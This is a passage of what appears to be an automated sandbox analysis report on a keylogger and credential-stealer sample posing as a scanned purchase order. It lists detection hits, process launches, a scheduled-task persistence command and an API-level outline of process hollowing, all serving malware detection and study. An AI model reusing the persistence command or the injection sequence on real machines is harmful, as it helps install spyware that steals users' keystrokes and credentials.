                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 50%, ReversingLabs
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:03:18:05
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp"
                                                                                                      Imagebase:0xb50000
                                                                                                      File size:187'904 bytes
                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:03:18:06
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:03:18:06
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                                                                                                      Imagebase:0x7a0000
                                                                                                      File size:835'592 bytes
                                                                                                      MD5 hash:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:9.9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:230
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph 40393 13cd0dc 40394 13cd0f4 40393->40394 40398 13cd14e 40394->40398 40400 5684d48 40394->40400 40404 56826d4 40394->40404 40413 5684d3a 40394->40413 40417 5685aa8 40394->40417 40401 5684d6e 40400->40401 40402 56826d4 CallWindowProcW 40401->40402 40403 5684d8f 40402->40403 40403->40398 40405 56826df 40404->40405 40406 5685b19 40405->40406 40408 5685b09 40405->40408 40409 5685b17 40406->40409 40442 56827fc 40406->40442 40426 5685c3a 40408->40426 40431 5685c40 40408->40431 40436 5685d0c 40408->40436 40414 5684d6e 40413->40414 40415 56826d4 CallWindowProcW 40414->40415 40416 5684d8f 40415->40416 40416->40398 40421 5685ae5 40417->40421 40418 5685b19 40419 5685b17 40418->40419 40420 56827fc CallWindowProcW 40418->40420 40420->40419 40421->40418 40422 5685b09 40421->40422 40423 5685c3a CallWindowProcW 40422->40423 40424 5685d0c CallWindowProcW 40422->40424 40425 5685c40 CallWindowProcW 40422->40425 40423->40419 40424->40419 40425->40419 40428 5685c40 40426->40428 40427 5685ce0 40427->40409 40446 5685ce8 40428->40446 40450 5685cf8 40428->40450 40433 5685c54 40431->40433 40432 5685ce0 40432->40409 40434 5685ce8 CallWindowProcW 40433->40434 40435 5685cf8 CallWindowProcW 40433->40435 40434->40432 40435->40432 40437 5685cca 40436->40437 40438 5685d1a 40436->40438 40440 5685ce8 CallWindowProcW 40437->40440 40441 5685cf8 CallWindowProcW 40437->40441 40439 5685ce0 40439->40409 40440->40439 40441->40439 40443 5682807 40442->40443 40444 56871fa CallWindowProcW 40443->40444 40445 56871a9 40443->40445 40444->40445 40445->40409 40447 5685cf8 40446->40447 40448 5685d09 40447->40448 40453 5687131 40447->40453 40448->40427 40451 5685d09 40450->40451 40452 5687131 CallWindowProcW 40450->40452 40451->40427 40452->40451 40454 56827fc CallWindowProcW 40453->40454 40455 568714a 40454->40455 40455->40448 40456 5684b90 40457 5684bf8 CreateWindowExW 40456->40457 40459 5684cb4 40457->40459 40459->40459 40389 141e218 40390 141e260 GetModuleHandleW 40389->40390 40391 141e25a 40389->40391 40392 141e28d 40390->40392 40391->40390 40172 c1cb530 40173 c1cb6bb 40172->40173 40174 c1cb556 40172->40174 40174->40173 40176 c1c5e18 40174->40176 40177 c1cb7b0 PostMessageW 40176->40177 40178 c1cb81c 40177->40178 40178->40174 40179 c1c7da1 40180 c1c7da7 40179->40180 40186 c1ca3ae 40180->40186 40205 c1ca310 40180->40205 40224 c1ca348 40180->40224 40242 c1ca338 40180->40242 40181 c1c7db8 40181->40181 40187 c1ca33c 40186->40187 40188 c1ca3b1 40186->40188 40189 c1ca36a 40187->40189 40260 c1ca7b9 40187->40260 40265 c1ca9be 40187->40265 40270 c1caa7c 40187->40270 40275 c1ca8c3 40187->40275 40279 c1cae23 40187->40279 40284 c1ca821 40187->40284 40288 c1cabe7 40187->40288 40292 c1ca966 40187->40292 40297 c1ca90b 40187->40297 40302 c1cac2b 40187->40302 40307 c1cb14a 40187->40307 40311 c1cae08 40187->40311 40315 c1ca9d1 40187->40315 40319 c1cabb0 40187->40319 40326 c1ca89b 40187->40326 40188->40181 40189->40181 40206 c1ca31f 40205->40206 40207 c1ca347 40205->40207 40206->40181 40208 c1ca36a 40207->40208 40209 c1caa7c 2 API calls 40207->40209 40210 c1ca9be 2 API calls 40207->40210 40211 c1ca7b9 2 API calls 40207->40211 40212 c1ca89b 2 API calls 40207->40212 40213 c1cabb0 4 API calls 40207->40213 40214 c1ca9d1 2 API calls 40207->40214 40215 c1cae08 2 API calls 40207->40215 40216 c1cb14a 2 API calls 40207->40216 40217 c1cac2b 2 API calls 40207->40217 40218 c1ca90b 2 API calls 40207->40218 40219 c1ca966 2 API calls 40207->40219 40220 c1cabe7 2 API calls 40207->40220 40221 c1ca821 2 API calls 40207->40221 40222 c1cae23 2 API calls 40207->40222 40223 c1ca8c3 2 API calls 40207->40223 40208->40181 40209->40208 40210->40208 40211->40208 40212->40208 40213->40208 40214->40208 40215->40208 40216->40208 40217->40208 40218->40208 40219->40208 40220->40208 40221->40208 40222->40208 40223->40208 40225 c1ca362 40224->40225 40226 c1ca36a 40225->40226 40227 c1caa7c 2 API calls 40225->40227 40228 c1ca9be 2 API calls 40225->40228 40229 c1ca7b9 2 API calls 40225->40229 40230 c1ca89b 2 API calls 40225->40230 40231 c1cabb0 4 API calls 40225->40231 40232 c1ca9d1 2 API calls 40225->40232 40233 c1cae08 2 API calls 40225->40233 40234 c1cb14a 2 API calls 40225->40234 40235 c1cac2b 2 API calls 40225->40235 40236 c1ca90b 2 API calls 40225->40236 40237 c1ca966 2 API calls 40225->40237 40238 c1cabe7 2 API calls 40225->40238 40239 c1ca821 2 API calls 40225->40239 40240 c1cae23 2 API calls 40225->40240 40241 c1ca8c3 2 API calls 40225->40241 40226->40181 40227->40226 40228->40226 40229->40226 40230->40226 40231->40226 40232->40226 40233->40226 40234->40226 40235->40226 40236->40226 40237->40226 40238->40226 40239->40226 40240->40226 40241->40226 40243 c1ca33c 40242->40243 40244 c1caa7c 2 API calls 40243->40244 40245 c1ca9be 2 API calls 40243->40245 40246 c1ca7b9 2 API calls 40243->40246 40247 c1ca89b 2 API calls 40243->40247 40248 c1ca36a 40243->40248 40249 c1cabb0 4 API calls 40243->40249 40250 c1ca9d1 2 API calls 40243->40250 40251 c1cae08 2 API calls 40243->40251 40252 c1cb14a 2 API calls 40243->40252 40253 c1cac2b 2 API calls 40243->40253 40254 c1ca90b 2 API calls 40243->40254 40255 c1ca966 2 API calls 40243->40255 40256 c1cabe7 2 API calls 40243->40256 40257 c1ca821 2 API calls 40243->40257 40258 c1cae23 2 API calls 40243->40258 40259 c1ca8c3 2 API calls 40243->40259 40244->40248 40245->40248 40246->40248 40247->40248 40248->40181 40249->40248 40250->40248 40251->40248 40252->40248 40253->40248 40254->40248 40255->40248 40256->40248 40257->40248 40258->40248 40259->40248 40261 c1ca7c6 40260->40261 40262 c1ca857 40261->40262 40331 c1c75f4 40261->40331 40335 c1c7600 40261->40335 40262->40189 40266 c1caa83 40265->40266 40339 c1c7378 40266->40339 40343 c1c7374 40266->40343 40267 c1cb172 40271 c1caa82 40270->40271 40273 c1c7378 WriteProcessMemory 40271->40273 40274 c1c7374 WriteProcessMemory 40271->40274 40272 c1cb172 40273->40272 40274->40272 40276 c1ca8d0 40275->40276 40347 c1c7129 40276->40347 40351 c1c7130 40276->40351 40280 c1cae71 40279->40280 40355 c1c72b8 40280->40355 40359 c1c72b1 40280->40359 40281 c1cae8f 40286 c1c75f4 CreateProcessA 40284->40286 40287 c1c7600 CreateProcessA 40284->40287 40285 c1ca857 40285->40189 40286->40285 40287->40285 40289 c1ca882 40288->40289 40363 c1c7468 40288->40363 40367 c1c7460 40288->40367 40289->40189 40293 c1ca926 40292->40293 40294 c1ca947 40292->40294 40293->40294 40295 c1c7378 WriteProcessMemory 40293->40295 40296 c1c7374 WriteProcessMemory 40293->40296 40294->40189 40295->40294 40296->40294 40298 c1ca915 40297->40298 40300 c1c7378 WriteProcessMemory 40298->40300 40301 c1c7374 WriteProcessMemory 40298->40301 40299 c1ca947 40299->40189 40300->40299 40301->40299 40303 c1cabe8 40302->40303 40304 c1ca882 40302->40304 40305 c1c7468 ReadProcessMemory 40303->40305 40306 c1c7460 ReadProcessMemory 40303->40306 40304->40189 40305->40304 40306->40304 40308 c1cb172 40307->40308 40309 c1c7378 WriteProcessMemory 40307->40309 40310 c1c7374 WriteProcessMemory 40307->40310 40309->40308 40310->40308 40312 c1cadb7 40311->40312 40312->40311 40313 c1c7129 ResumeThread 40312->40313 40314 c1c7130 ResumeThread 40312->40314 40313->40312 40314->40312 40371 c1c71d9 40315->40371 40375 c1c71e0 40315->40375 40316 c1ca9eb 40379 c1cb45f 40319->40379 40384 c1cb470 40319->40384 40320 c1cabc8 40321 c1cafa3 40320->40321 40324 c1c7129 ResumeThread 40320->40324 40325 c1c7130 ResumeThread 40320->40325 40321->40189 40324->40320 40325->40320 40327 c1ca8ab 40326->40327 40329 c1c7378 WriteProcessMemory 40327->40329 40330 c1c7374 WriteProcessMemory 40327->40330 40328 c1caba4 40328->40189 40329->40328 40330->40328 40332 c1c7600 CreateProcessA 40331->40332 40334 c1c784b 40332->40334 40334->40334 40336 c1c7689 CreateProcessA 40335->40336 40338 c1c784b 40336->40338 40338->40338 40340 c1c73c0 WriteProcessMemory 40339->40340 40342 c1c7417 40340->40342 40342->40267 40344 c1c7378 WriteProcessMemory 40343->40344 40346 c1c7417 40344->40346 40346->40267 40348 c1c7170 ResumeThread 40347->40348 40350 c1c71a1 40348->40350 40350->40276 40352 c1c7170 ResumeThread 40351->40352 40354 c1c71a1 40352->40354 40354->40276 40356 c1c72f8 VirtualAllocEx 40355->40356 40358 c1c7335 40356->40358 40358->40281 40360 c1c72b8 VirtualAllocEx 40359->40360 40362 c1c7335 40360->40362 40362->40281 40364 c1c74b3 ReadProcessMemory 40363->40364 40366 c1c74f7 40364->40366 40366->40289 40368 c1c74b3 ReadProcessMemory 40367->40368 40370 c1c74f7 40368->40370 40370->40289 40372 c1c7225 Wow64SetThreadContext 40371->40372 40374 c1c726d 40372->40374 40374->40316 40376 c1c7225 Wow64SetThreadContext 40375->40376 40378 c1c726d 40376->40378 40378->40316 40380 c1cb470 40379->40380 40382 c1c71d9 Wow64SetThreadContext 40380->40382 40383 c1c71e0 Wow64SetThreadContext 40380->40383 40381 c1cb49b 40381->40320 40382->40381 40383->40381 40385 c1cb485 40384->40385 40387 c1c71d9 Wow64SetThreadContext 40385->40387 40388 c1c71e0 Wow64SetThreadContext 40385->40388 40386 c1cb49b 40386->40320 40387->40386 40388->40386

                                                                                                        Executed Functions

                                                                                                        Function 0C1C4410 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0&
                                                                                                        • API String ID: 0-766115343
                                                                                                        • Opcode ID: 6cd00cc168efec4a44d2a1d0a7dbc2757fe0a97b62f003e13acd7cfa901361f2
                                                                                                        • Instruction ID: d18c1767c0b459861aa1da516e37081d9121d394495c5b0087760ab2b95143f4
                                                                                                        • Opcode Fuzzy Hash: 6cd00cc168efec4a44d2a1d0a7dbc2757fe0a97b62f003e13acd7cfa901361f2
                                                                                                        • Instruction Fuzzy Hash: 16E12874E051198FCB14DFA9D5909AEBBB2FF89304F248169E405AB356D734AD81CFA0
                                                                                                        Function 0C1CC128 Relevance: .4, Instructions: 437COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0561773f6093637d1e80b44848c67b7a37d765410da098629de99b80200d0ad1
                                                                                                        • Instruction ID: 08171c1ab97b5ac05c06444922fda9434f07ff5649328fc15d1131f1e81350d5
                                                                                                        • Opcode Fuzzy Hash: 0561773f6093637d1e80b44848c67b7a37d765410da098629de99b80200d0ad1
                                                                                                        • Instruction Fuzzy Hash: CDE1AC71B026048FDB15DBB6D4A0BAE77F6AFA9300F24446EE149DB2A4DB34DC01CB91
                                                                                                        Function 0C1CAFFB Relevance: .0, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5bc0e398c2f045d00f306e40adb1ef4dc7efb4cd0ffb1f0fc8bd1c3a56f7325c
                                                                                                        • Instruction ID: c4a4e68bdd36b38ba72379c8f7ef386c5d2e8f8a475b895aeed0009e62425c93
                                                                                                        • Opcode Fuzzy Hash: 5bc0e398c2f045d00f306e40adb1ef4dc7efb4cd0ffb1f0fc8bd1c3a56f7325c
                                                                                                        • Instruction Fuzzy Hash: 87A00204FDE01886D0099D9018D11F8C07C173B005F42700CB10A730424B58E82B201C
                                                                                                        Function 0C1C75F4 Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 535 c1c75f4-c1c7695 538 c1c76ce-c1c76ee 535->538 539 c1c7697-c1c76a1 535->539 546 c1c7727-c1c7756 538->546 547 c1c76f0-c1c76fa 538->547 539->538 540 c1c76a3-c1c76a5 539->540 541 c1c76c8-c1c76cb 540->541 542 c1c76a7-c1c76b1 540->542 541->538 544 c1c76b5-c1c76c4 542->544 545 c1c76b3 542->545 544->544 548 c1c76c6 544->548 545->544 555 c1c778f-c1c7849 CreateProcessA 546->555 556 c1c7758-c1c7762 546->556 547->546 549 c1c76fc-c1c76fe 547->549 548->541 551 c1c7700-c1c770a 549->551 552 c1c7721-c1c7724 549->552 553 c1c770c 551->553 554 c1c770e-c1c771d 551->554 552->546 553->554 554->554 557 c1c771f 554->557 567 c1c784b-c1c7851 555->567 568 c1c7852-c1c78d8 555->568 556->555 558 c1c7764-c1c7766 556->558 557->552 560 c1c7768-c1c7772 558->560 561 c1c7789-c1c778c 558->561 562 c1c7774 560->562 563 c1c7776-c1c7785 560->563 561->555 562->563 563->563 565 c1c7787 563->565 565->561 567->568 578 c1c78e8-c1c78ec 568->578 579 c1c78da-c1c78de 568->579 580 c1c78fc-c1c7900 578->580 581 c1c78ee-c1c78f2 578->581 579->578 582 c1c78e0 579->582 584 c1c7910-c1c7914 580->584 585 c1c7902-c1c7906 580->585 581->580 583 c1c78f4 581->583 582->578 583->580 587 c1c7926-c1c792d 584->587 588 c1c7916-c1c791c 584->588 585->584 586 c1c7908 585->586 586->584 589 c1c792f-c1c793e 587->589 590 c1c7944 587->590 588->587 589->590 591 c1c7945 590->591 591->591
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0C1C7836
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 3ab7eae77e17ddb0319e0393a5f5b903f9df225a41e036688c2ba4ef487c3609
                                                                                                        • Instruction ID: 261dd6e9c3037749656f1c49118376352d1ec11b44228f1d14c2b7ff1a4f9afb
                                                                                                        • Opcode Fuzzy Hash: 3ab7eae77e17ddb0319e0393a5f5b903f9df225a41e036688c2ba4ef487c3609
                                                                                                        • Instruction Fuzzy Hash: B3A17C71E00219DFDB20DFA9C8807EDBBB2FF54314F1485A9E848A7290DBB49995CF91
                                                                                                        Function 0C1C7600 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 593 c1c7600-c1c7695 595 c1c76ce-c1c76ee 593->595 596 c1c7697-c1c76a1 593->596 603 c1c7727-c1c7756 595->603 604 c1c76f0-c1c76fa 595->604 596->595 597 c1c76a3-c1c76a5 596->597 598 c1c76c8-c1c76cb 597->598 599 c1c76a7-c1c76b1 597->599 598->595 601 c1c76b5-c1c76c4 599->601 602 c1c76b3 599->602 601->601 605 c1c76c6 601->605 602->601 612 c1c778f-c1c7849 CreateProcessA 603->612 613 c1c7758-c1c7762 603->613 604->603 606 c1c76fc-c1c76fe 604->606 605->598 608 c1c7700-c1c770a 606->608 609 c1c7721-c1c7724 606->609 610 c1c770c 608->610 611 c1c770e-c1c771d 608->611 609->603 610->611 611->611 614 c1c771f 611->614 624 c1c784b-c1c7851 612->624 625 c1c7852-c1c78d8 612->625 613->612 615 c1c7764-c1c7766 613->615 614->609 617 c1c7768-c1c7772 615->617 618 c1c7789-c1c778c 615->618 619 c1c7774 617->619 620 c1c7776-c1c7785 617->620 618->612 619->620 620->620 622 c1c7787 620->622 622->618 624->625 635 c1c78e8-c1c78ec 625->635 636 c1c78da-c1c78de 625->636 637 c1c78fc-c1c7900 635->637 638 c1c78ee-c1c78f2 635->638 636->635 639 c1c78e0 636->639 641 c1c7910-c1c7914 637->641 642 c1c7902-c1c7906 637->642 638->637 640 c1c78f4 638->640 639->635 640->637 644 c1c7926-c1c792d 641->644 645 c1c7916-c1c791c 641->645 642->641 643 c1c7908 642->643 643->641 646 c1c792f-c1c793e 644->646 647 c1c7944 644->647 645->644 646->647 648 c1c7945 647->648 648->648
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0C1C7836
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 9d5e7a1df0935e9e223f4419ca4432dabcfcf396870d01560389276c2370e228
                                                                                                        • Instruction ID: f76a254ec25ea27530204d36b4dc1ecd66bc874d4daff9ebaa9ad132f079d492
                                                                                                        • Opcode Fuzzy Hash: 9d5e7a1df0935e9e223f4419ca4432dabcfcf396870d01560389276c2370e228
                                                                                                        • Instruction Fuzzy Hash: DA916C71E00219DFDB10DFA9C8807EDBBB2FF54314F1485A9E848A7290DBB49995CF91
                                                                                                        Function 05684B84 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 650 5684b84-5684bf6 652 5684bf8-5684bfe 650->652 653 5684c01-5684c08 650->653 652->653 654 5684c0a-5684c10 653->654 655 5684c13-5684c4b 653->655 654->655 656 5684c53-5684cb2 CreateWindowExW 655->656 657 5684cbb-5684cf3 656->657 658 5684cb4-5684cba 656->658 662 5684d00 657->662 663 5684cf5-5684cf8 657->663 658->657 664 5684d01 662->664 663->662 664->664
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05684CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 81997fbaf8aee7eabfe5575e0d4e103a5e163378400e18cea91a477bd67905fe
                                                                                                        • Instruction ID: 389cccf8c07454ecf4093b70e10f7bd13c1f347b38274541edbbbefa06f58864
                                                                                                        • Opcode Fuzzy Hash: 81997fbaf8aee7eabfe5575e0d4e103a5e163378400e18cea91a477bd67905fe
                                                                                                        • Instruction Fuzzy Hash: 1A51B0B1D103099FDF14DF99C984ADEBBB5FF48314F24822AE419AB210D7759845CF91
                                                                                                        Function 05684B90 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 773 5684b90-5684bf6 774 5684bf8-5684bfe 773->774 775 5684c01-5684c08 773->775 774->775 776 5684c0a-5684c10 775->776 777 5684c13-5684cb2 CreateWindowExW 775->777 776->777 779 5684cbb-5684cf3 777->779 780 5684cb4-5684cba 777->780 784 5684d00 779->784 785 5684cf5-5684cf8 779->785 780->779 786 5684d01 784->786 785->784 786->786
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05684CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 80d7eef34cf87ce6513b398fa621f7407ac438b34c0b55921690bfe5b5053192
                                                                                                        • Instruction ID: f735f1a69e211d93adb275a7a154da13b649463a7e05c701c8a137445984d23b
                                                                                                        • Opcode Fuzzy Hash: 80d7eef34cf87ce6513b398fa621f7407ac438b34c0b55921690bfe5b5053192
                                                                                                        • Instruction Fuzzy Hash: 1C41C1B1D003099FDF14DF99C984ADEBBB5FF48314F24822AE819AB210DB759845CF90
                                                                                                        Function 056827FC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 787 56827fc-568719c 790 568724c-568726c call 56826d4 787->790 791 56871a2-56871a7 787->791 798 568726f-568727c 790->798 793 56871a9-56871e0 791->793 794 56871fa-5687232 CallWindowProcW 791->794 800 56871e9-56871f8 793->800 801 56871e2-56871e8 793->801 796 568723b-568724a 794->796 797 5687234-568723a 794->797 796->798 797->796 800->798 801->800
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05687221
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: 66c987ac30a08415d4aef77276d34e49b835a38de23c0e7dcb1aeb3804daffd4
                                                                                                        • Instruction ID: 76106f2d4f313a97eecbbe9e143f4d0d8ce9fe85ffc58ad58d3dfb3895f2b0c7
                                                                                                        • Opcode Fuzzy Hash: 66c987ac30a08415d4aef77276d34e49b835a38de23c0e7dcb1aeb3804daffd4
                                                                                                        • Instruction Fuzzy Hash: C14129B4900209CFCB14DF99C488AAABBF5FB88314F24C559E559AB321D775A941CFA0
                                                                                                        Function 01416914 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 804 1416914-1419081 CreateActCtxA 807 1419083-1419089 804->807 808 141908a-14190e4 804->808 807->808 815 14190f3-14190f7 808->815 816 14190e6-14190e9 808->816 817 14190f9-1419105 815->817 818 1419108 815->818 816->815 817->818
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01419071
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1731693603.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1410000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 7bfbee1476b8b68d1c20f22fa82cc4d5b28f8cfa41cf2b86e2db81220a6c4409
                                                                                                        • Instruction ID: 96b87303c6c3314a98362c8f4b0c033cad0b286784914644432abc086c336ec1
                                                                                                        • Opcode Fuzzy Hash: 7bfbee1476b8b68d1c20f22fa82cc4d5b28f8cfa41cf2b86e2db81220a6c4409
